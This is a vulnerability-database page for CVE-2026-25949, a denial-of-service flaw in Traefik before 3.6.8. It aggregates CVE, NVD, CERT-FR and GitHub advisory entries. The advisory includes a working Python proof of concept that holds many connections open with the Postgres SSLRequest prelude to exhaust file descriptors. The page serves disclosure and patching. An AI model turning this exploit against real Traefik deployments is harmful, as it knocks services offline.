Vulnerability-Lookup

CVE-2026-25949 (GCVE-0-2026-25949)

Vulnerability from cvelistv5 – Published: 2026-02-12 20:01 – Updated: 2026-02-12 21:16

Title

Traefik: TCP readTimeout bypass via STARTTLS on Postgres

Summary

Traefik is an HTTP reverse proxy and load balancer. Prior to 3.6.8, there is a potential vulnerability in Traefik managing STARTTLS requests. An unauthenticated client can bypass Traefik entrypoint respondingTimeouts.readTimeout by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely, leading to a denial of service. This vulnerability is fixed in 3.6.8.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-400 - Uncontrolled Resource Consumption

Assigner

GitHub_M

References

URL

Tags

	https://github.com/traefik/traefik/security/advis…	x_refsource_CONFIRM
	https://github.com/traefik/traefik/commit/31e566e…	x_refsource_MISC
	https://github.com/traefik/traefik/releases/tag/v3.6.8	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	traefik	traefik	Affected: < 3.6.8

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-25949",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-12T20:47:57.313606Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-12T21:16:17.659Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "traefik",
          "vendor": "traefik",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.6.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Traefik is an HTTP reverse proxy and load balancer. Prior to 3.6.8, there is a potential vulnerability in Traefik managing STARTTLS requests. An unauthenticated client can bypass Traefik entrypoint respondingTimeouts.readTimeout by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely, leading to a denial of service. This vulnerability is fixed in 3.6.8."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400: Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-12T20:01:19.600Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w"
        },
        {
          "name": "https://github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678"
        },
        {
          "name": "https://github.com/traefik/traefik/releases/tag/v3.6.8",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/traefik/traefik/releases/tag/v3.6.8"
        }
      ],
      "source": {
        "advisory": "GHSA-89p3-4642-cr2w",
        "discovery": "UNKNOWN"
      },
      "title": "Traefik: TCP readTimeout bypass via STARTTLS on Postgres"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-25949",
    "datePublished": "2026-02-12T20:01:19.600Z",
    "dateReserved": "2026-02-09T17:13:54.065Z",
    "dateUpdated": "2026-02-12T21:16:17.659Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-25949\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-12T20:16:11.227\",\"lastModified\":\"2026-02-20T18:44:41.160\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Traefik is an HTTP reverse proxy and load balancer. Prior to 3.6.8, there is a potential vulnerability in Traefik managing STARTTLS requests. An unauthenticated client can bypass Traefik entrypoint respondingTimeouts.readTimeout by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely, leading to a denial of service. This vulnerability is fixed in 3.6.8.\"},{\"lang\":\"es\",\"value\":\"Traefik es un proxy inverso HTTP y un balanceador de carga. Antes de la versi\u00f3n 3.6.8, existe una posible vulnerabilidad en Traefik al gestionar solicitudes STARTTLS. Un cliente no autenticado puede eludir el respondingTimeouts.readTimeout del punto de entrada de Traefik enviando el pre\u00e1mbulo de 8 bytes de Postgres SSLRequest (STARTTLS) y luego estanc\u00e1ndose, lo que provoca que las conexiones permanezcan abiertas indefinidamente, lo que lleva a una denegaci\u00f3n de servicio. Esta vulnerabilidad se corrige en la versi\u00f3n 3.6.8.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-400\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.6.8\",\"matchCriteriaId\":\"05ADF4F6-5356-4E37-9CBB-0C5058E249D5\"}]}]}],\"references\":[{\"url\":\"https://github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/traefik/traefik/releases/tag/v3.6.8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-25949\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-12T20:47:57.313606Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-12T21:15:53.389Z\"}}], \"cna\": {\"title\": \"Traefik: TCP readTimeout bypass via STARTTLS on Postgres\", \"source\": {\"advisory\": \"GHSA-89p3-4642-cr2w\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"traefik\", \"product\": \"traefik\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.6.8\"}]}], \"references\": [{\"url\": \"https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w\", \"name\": \"https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678\", \"name\": \"https://github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v3.6.8\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v3.6.8\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Traefik is an HTTP reverse proxy and load balancer. Prior to 3.6.8, there is a potential vulnerability in Traefik managing STARTTLS requests. An unauthenticated client can bypass Traefik entrypoint respondingTimeouts.readTimeout by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely, leading to a denial of service. This vulnerability is fixed in 3.6.8.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-400\", \"description\": \"CWE-400: Uncontrolled Resource Consumption\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-12T20:01:19.600Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-25949\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-12T21:16:17.659Z\", \"dateReserved\": \"2026-02-09T17:13:54.065Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-12T20:01:19.600Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-25949

Vulnerability from fkie_nvd - Published: 2026-02-12 20:16 - Updated: 2026-02-20 18:44

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678	Patch
security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v3.6.8	Product, Release Notes
security-advisories@github.com	https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w	Patch, Vendor Advisory

Impacted products

	Vendor	Product	Version
	traefik	traefik	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "05ADF4F6-5356-4E37-9CBB-0C5058E249D5",
              "versionEndExcluding": "3.6.8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Traefik is an HTTP reverse proxy and load balancer. Prior to 3.6.8, there is a potential vulnerability in Traefik managing STARTTLS requests. An unauthenticated client can bypass Traefik entrypoint respondingTimeouts.readTimeout by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely, leading to a denial of service. This vulnerability is fixed in 3.6.8."
    },
    {
      "lang": "es",
      "value": "Traefik es un proxy inverso HTTP y un balanceador de carga. Antes de la versi\u00f3n 3.6.8, existe una posible vulnerabilidad en Traefik al gestionar solicitudes STARTTLS. Un cliente no autenticado puede eludir el respondingTimeouts.readTimeout del punto de entrada de Traefik enviando el pre\u00e1mbulo de 8 bytes de Postgres SSLRequest (STARTTLS) y luego estanc\u00e1ndose, lo que provoca que las conexiones permanezcan abiertas indefinidamente, lo que lleva a una denegaci\u00f3n de servicio. Esta vulnerabilidad se corrige en la versi\u00f3n 3.6.8."
    }
  ],
  "id": "CVE-2026-25949",
  "lastModified": "2026-02-20T18:44:41.160",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-02-12T20:16:11.227",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.8"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-400"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

CERTFR-2026-AVI-0154

Vulnerability from certfr_avis - Published: 2026-02-12 - Updated: 2026-02-12

Une vulnérabilité a été découverte dans Traefik. Elle permet à un attaquant de provoquer un déni de service à distance et un contournement de la politique de sécurité.

Solutions

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

Impacted products

	Vendor	Product	Description
	Traefik	Traefik	Traefik versions antérieures à v3.6.8

References

Title

Publication Time

GHSA-89P3-4642-CR2W

Vulnerability from github – Published: 2026-02-12 15:54 – Updated: 2026-02-12 22:08

Summary

Traefik: TCP readTimeout bypass via STARTTLS on Postgres

Details

Impact

There is a potential vulnerability in Traefik managing STARTTLS requests.

An unauthenticated client can bypass Traefik entrypoint respondingTimeouts.readTimeout by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely, leading to a denial of service.

Patches

https://github.com/traefik/traefik/releases/tag/v3.6.8

For more information

If you have any questions or comments about this advisory, please open an issue.

Original Description ### Summary A remote, unauthenticated client can bypass Traefik entrypoint `respondingTimeouts.readTimeout` by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely and enabling file-descriptor and goroutine exhaustion denial of service. This triggers during protocol detection **before routing**, so it is reachable on an entrypoint even when **no Postgres/TCP routers are configured** (the PoC uses only an HTTP router). ### Details Traefik applies per-connection deadlines based on `entryPoints..transport.respondingTimeouts.readTimeout` to prevent protocol detection and request reads from blocking forever (see `pkg/server/server_entrypoint_tcp.go`, which sets `SetReadDeadline` on accepted connections). However, in the TCP router protocol detection path (`pkg/server/router/tcp/router.go`), when Traefik detects the Postgres STARTTLS signature on a new connection, it executes a fast-path that clears deadlines: - detect Postgres SSLRequest (8-byte signature), - call `conn.SetDeadline(time.Time{})` (clears all deadlines), - then enter the Postgres STARTTLS handler (`servePostgres`). The Postgres handler (`pkg/server/router/tcp/postgres.go`) then blocks waiting for a TLS ClientHello via the same peeking logic used elsewhere (`clientHelloInfo(br)`), but with deadlines removed. An attacker can therefore: 1. connect to any internet-exposed TCP entrypoint, 2. send the Postgres SSLRequest (SSL negotiation request), 3. receive Traefik’s single-byte response (`S`), 4. stop sending any further bytes. Each such connection remains open past the configured `readTimeout` (indefinitely), consuming a goroutine and a file descriptor until Traefik hits process limits. _Of note_: CVE-2026-22045 fixed a conceptually-similar DoS where a protocol-specific fast path cleared connection deadlines and then could block in TLS handshake processing, allowing unauthenticated clients to tie up goroutines/FDs indefinitely. This report is the same failure mode, but triggered via the Postgres STARTTLS detection path. Tested versions: - `v3.6.7` - `master` at commit `a4a91344edcdd6276c1b766ca19ee3f0e346480f` ### PoC Prerequisites: - Linux host - Python 3 - A prebuilt Traefik `v3.6.7` binary. The script below expects the path in the script’s `TRAEFIK_BIN` constant (edit if needed). Execute the script below: Script (Click to expand)

#!/usr/bin/env python3
from __future__ import annotations

import os
import socket
import subprocess
import tempfile
import time
from typing import Final

# Hardcode the Traefik binary path. Edit as needed.
TRAEFIK_BIN: Final[str] = "/usr/local/sbin/traefik"

HOST: Final[str] = "127.0.0.1"
PORT: Final[int] = 18080

STARTUP_SLEEP_SECS: Final[float] = 2.0
READ_TIMEOUT_SECS: Final[float] = 2.0
SLEEP_SECS: Final[float] = 3.5
N_CONNS: Final[int] = 300

POSTGRES_SSLREQUEST: Final[bytes] = bytes([0x00, 0x00, 0x00, 0x08, 0x04, 0xD2, 0x16, 0x2F])


def fd_count(pid: int) -> int:
    return len(os.listdir(f"/proc/{pid}/fd"))


def open_idle_conns(n: int) -> list[socket.socket]:
    conns: list[socket.socket] = []
    for _ in range(n):
        conns.append(socket.create_connection((HOST, PORT)))
    return conns


def open_postgres_sslrequest_conns(n: int) -> list[socket.socket]:
    conns: list[socket.socket] = []
    for _ in range(n):
        s = socket.create_connection((HOST, PORT))
        s.settimeout(1.0)
        s.sendall(POSTGRES_SSLREQUEST)
        try:
            _ = s.recv(1)  # typically b"S"
        except socket.timeout:
            pass
        conns.append(s)
    return conns


def close_all(conns: list[socket.socket]) -> None:
    for s in conns:
        try:
            s.close()
        except OSError:
            pass


def main() -> None:
    with tempfile.TemporaryDirectory(prefix="vh-traefik-f005-") as td:
        dyn = os.path.join(td, "dynamic.yml")
        with open(dyn, "w", encoding="utf-8") as f:
            f.write(
                f"""\
http:
  routers:
    r:
      entryPoints: [web]
      rule: "PathPrefix(`/`)"
      service: s
  services:
    s:
      loadBalancer:
        servers:
          - url: "http://{HOST}:9"
"""
            )

        proc = subprocess.Popen(
            [
                TRAEFIK_BIN,
                "--log.level=ERROR",
                f"--entryPoints.web.address=:{PORT}",
                f"--entryPoints.web.transport.respondingTimeouts.readTimeout={READ_TIMEOUT_SECS}s",
                f"--providers.file.filename={dyn}",
                "--providers.file.watch=false",
            ],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.STDOUT,
        )
        try:
            time.sleep(STARTUP_SLEEP_SECS)

            pid = proc.pid
            if pid is None:
                raise RuntimeError("Traefik PID is None")

            ver = subprocess.check_output([TRAEFIK_BIN, "version"], text=True).strip()
            print(ver)
            print(f"Traefik={TRAEFIK_BIN}")
            print(f"Host={HOST} Port={PORT} ReadTimeout={READ_TIMEOUT_SECS}s N={N_CONNS} Sleep={SLEEP_SECS}s")

            base = fd_count(pid)
            print(f"traefik_pid={pid} fd_base={base}")

            idle = open_idle_conns(N_CONNS)
            fd_after_open_idle = fd_count(pid)
            print(f"baseline_opened={N_CONNS} fd_after_open={fd_after_open_idle} delta={fd_after_open_idle - base}")
            time.sleep(SLEEP_SECS)
            fd_after_sleep_idle = fd_count(pid)
            print(f"baseline_after_sleep fd={fd_after_sleep_idle} delta_from_base={fd_after_sleep_idle - base}")
            close_all(idle)

            pg = open_postgres_sslrequest_conns(N_CONNS)
            fd_after_open_pg = fd_count(pid)
            print(f"candidate_opened={N_CONNS} fd_after_open={fd_after_open_pg} delta={fd_after_open_pg - base}")
            time.sleep(SLEEP_SECS)
            fd_after_sleep_pg = fd_count(pid)
            print(f"candidate_after_sleep fd={fd_after_sleep_pg} delta_from_base={fd_after_sleep_pg - base}")
            close_all(pg)

            if (fd_after_sleep_idle - base) <= 5 and (fd_after_sleep_pg - base) >= (N_CONNS // 2):
                print("VULNERABLE: Postgres SSLRequest keeps connections open past entrypoint readTimeout.")
            else:
                print("INCONCLUSIVE: adjust N_CONNS upward or inspect Traefik logs.")
        finally:
            proc.terminate()
            try:
                proc.wait(timeout=3.0)
            except subprocess.TimeoutExpired:
                proc.kill()
                proc.wait(timeout=3.0)


if __name__ == "__main__":
    main()

Expected output (Click to expand)

Version:      3.6.7
Codename:     ramequin
Go version:   go1.24.11
Built:        2026-01-14T14:04:03Z
OS/Arch:      linux/amd64
Traefik=/usr/local/sbin/traefik
Host=127.0.0.1 Port=18080 ReadTimeout=2.0s N=300 Sleep=3.5s
traefik_pid=46204 fd_base=6
baseline_opened=300 fd_after_open=128 delta=122
baseline_after_sleep fd=6 delta_from_base=0
candidate_opened=300 fd_after_open=306 delta=300
candidate_after_sleep fd=306 delta_from_base=300
VULNERABLE: Postgres SSLRequest keeps connections open past entrypoint readTimeout.

### Impact Denial of service. Any internet-exposed entrypoint using the TCP switcher/protocol detection (including "web" HTTP entrypoints) with a `readTimeout` is affected; no Postgres configuration is required. At sufficient concurrency, Traefik can hit process limits (FD exhaustion/goroutine pressure/memory), taking the proxy offline.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.6.7"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25949"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-12T15:54:11Z",
    "nvd_published_at": "2026-02-12T20:16:11Z",
    "severity": "HIGH"
  },
  "details": "## Impact\n\nThere is a potential vulnerability in Traefik managing STARTTLS requests. \n\nAn unauthenticated client can bypass Traefik entrypoint `respondingTimeouts.readTimeout` by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely, leading to a denial of service. \n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v3.6.8\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\n### Summary\nA remote, unauthenticated client can bypass Traefik entrypoint `respondingTimeouts.readTimeout` by sending the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalling, causing connections to remain open indefinitely and enabling file-descriptor and goroutine exhaustion denial of service.\n\nThis triggers during protocol detection **before routing**, so it is reachable on an entrypoint even when **no Postgres/TCP routers are configured** (the PoC uses only an HTTP router).\n\n### Details\nTraefik applies per-connection deadlines based on `entryPoints.\u003cname\u003e.transport.respondingTimeouts.readTimeout` to prevent protocol detection and request reads from blocking forever (see `pkg/server/server_entrypoint_tcp.go`, which sets `SetReadDeadline` on accepted connections).\n\nHowever, in the TCP router protocol detection path (`pkg/server/router/tcp/router.go`), when Traefik detects the Postgres STARTTLS signature on a new connection, it executes a fast-path that clears deadlines:\n\n- detect Postgres SSLRequest (8-byte signature),\n- call `conn.SetDeadline(time.Time{})` (clears all deadlines),\n- then enter the Postgres STARTTLS handler (`servePostgres`).\n\nThe Postgres handler (`pkg/server/router/tcp/postgres.go`) then blocks waiting for a TLS ClientHello via the same peeking logic used elsewhere (`clientHelloInfo(br)`), but with deadlines removed. An attacker can therefore:\n\n1. connect to any internet-exposed TCP entrypoint,\n2. send the Postgres SSLRequest (SSL negotiation request),\n3. receive Traefik\u2019s single-byte response (`S`),\n4. stop sending any further bytes.\n\n\nEach such connection remains open past the configured `readTimeout` (indefinitely), consuming a goroutine and a file descriptor until Traefik hits process limits.\n\n_Of note_: CVE-2026-22045 fixed a conceptually-similar DoS where a protocol-specific fast path cleared connection deadlines and then could block in TLS handshake processing, allowing unauthenticated clients to tie up goroutines/FDs indefinitely. This report is the same failure mode, but triggered via the Postgres STARTTLS detection path.\n\nTested versions:\n- `v3.6.7`\n- `master` at commit `a4a91344edcdd6276c1b766ca19ee3f0e346480f` \n\n### PoC\nPrerequisites:\n- Linux host\n- Python 3\n- A prebuilt Traefik `v3.6.7` binary. The script below expects the path in the script\u2019s `TRAEFIK_BIN` constant (edit if needed).\n\nExecute the script below:\n\u003cdetails\u003e\n\u003csummary\u003eScript (Click to expand)\u003c/summary\u003e\n\n```python\n#!/usr/bin/env python3\nfrom __future__ import annotations\n\nimport os\nimport socket\nimport subprocess\nimport tempfile\nimport time\nfrom typing import Final\n\n# Hardcode the Traefik binary path. Edit as needed.\nTRAEFIK_BIN: Final[str] = \"/usr/local/sbin/traefik\"\n\nHOST: Final[str] = \"127.0.0.1\"\nPORT: Final[int] = 18080\n\nSTARTUP_SLEEP_SECS: Final[float] = 2.0\nREAD_TIMEOUT_SECS: Final[float] = 2.0\nSLEEP_SECS: Final[float] = 3.5\nN_CONNS: Final[int] = 300\n\nPOSTGRES_SSLREQUEST: Final[bytes] = bytes([0x00, 0x00, 0x00, 0x08, 0x04, 0xD2, 0x16, 0x2F])\n\n\ndef fd_count(pid: int) -\u003e int:\n    return len(os.listdir(f\"/proc/{pid}/fd\"))\n\n\ndef open_idle_conns(n: int) -\u003e list[socket.socket]:\n    conns: list[socket.socket] = []\n    for _ in range(n):\n        conns.append(socket.create_connection((HOST, PORT)))\n    return conns\n\n\ndef open_postgres_sslrequest_conns(n: int) -\u003e list[socket.socket]:\n    conns: list[socket.socket] = []\n    for _ in range(n):\n        s = socket.create_connection((HOST, PORT))\n        s.settimeout(1.0)\n        s.sendall(POSTGRES_SSLREQUEST)\n        try:\n            _ = s.recv(1)  # typically b\"S\"\n        except socket.timeout:\n            pass\n        conns.append(s)\n    return conns\n\n\ndef close_all(conns: list[socket.socket]) -\u003e None:\n    for s in conns:\n        try:\n            s.close()\n        except OSError:\n            pass\n\n\ndef main() -\u003e None:\n    with tempfile.TemporaryDirectory(prefix=\"vh-traefik-f005-\") as td:\n        dyn = os.path.join(td, \"dynamic.yml\")\n        with open(dyn, \"w\", encoding=\"utf-8\") as f:\n            f.write(\n                f\"\"\"\\\nhttp:\n  routers:\n    r:\n      entryPoints: [web]\n      rule: \"PathPrefix(`/`)\"\n      service: s\n  services:\n    s:\n      loadBalancer:\n        servers:\n          - url: \"http://{HOST}:9\"\n\"\"\"\n            )\n\n        proc = subprocess.Popen(\n            [\n                TRAEFIK_BIN,\n                \"--log.level=ERROR\",\n                f\"--entryPoints.web.address=:{PORT}\",\n                f\"--entryPoints.web.transport.respondingTimeouts.readTimeout={READ_TIMEOUT_SECS}s\",\n                f\"--providers.file.filename={dyn}\",\n                \"--providers.file.watch=false\",\n            ],\n            stdout=subprocess.DEVNULL,\n            stderr=subprocess.STDOUT,\n        )\n        try:\n            time.sleep(STARTUP_SLEEP_SECS)\n\n            pid = proc.pid\n            if pid is None:\n                raise RuntimeError(\"Traefik PID is None\")\n\n            ver = subprocess.check_output([TRAEFIK_BIN, \"version\"], text=True).strip()\n            print(ver)\n            print(f\"Traefik={TRAEFIK_BIN}\")\n            print(f\"Host={HOST} Port={PORT} ReadTimeout={READ_TIMEOUT_SECS}s N={N_CONNS} Sleep={SLEEP_SECS}s\")\n\n            base = fd_count(pid)\n            print(f\"traefik_pid={pid} fd_base={base}\")\n\n            idle = open_idle_conns(N_CONNS)\n            fd_after_open_idle = fd_count(pid)\n            print(f\"baseline_opened={N_CONNS} fd_after_open={fd_after_open_idle} delta={fd_after_open_idle - base}\")\n            time.sleep(SLEEP_SECS)\n            fd_after_sleep_idle = fd_count(pid)\n            print(f\"baseline_after_sleep fd={fd_after_sleep_idle} delta_from_base={fd_after_sleep_idle - base}\")\n            close_all(idle)\n\n            pg = open_postgres_sslrequest_conns(N_CONNS)\n            fd_after_open_pg = fd_count(pid)\n            print(f\"candidate_opened={N_CONNS} fd_after_open={fd_after_open_pg} delta={fd_after_open_pg - base}\")\n            time.sleep(SLEEP_SECS)\n            fd_after_sleep_pg = fd_count(pid)\n            print(f\"candidate_after_sleep fd={fd_after_sleep_pg} delta_from_base={fd_after_sleep_pg - base}\")\n            close_all(pg)\n\n            if (fd_after_sleep_idle - base) \u003c= 5 and (fd_after_sleep_pg - base) \u003e= (N_CONNS // 2):\n                print(\"VULNERABLE: Postgres SSLRequest keeps connections open past entrypoint readTimeout.\")\n            else:\n                print(\"INCONCLUSIVE: adjust N_CONNS upward or inspect Traefik logs.\")\n        finally:\n            proc.terminate()\n            try:\n                proc.wait(timeout=3.0)\n            except subprocess.TimeoutExpired:\n                proc.kill()\n                proc.wait(timeout=3.0)\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\u003c/details\u003e\n\n\n\u003cdetails\u003e\n\u003csummary\u003eExpected output (Click to 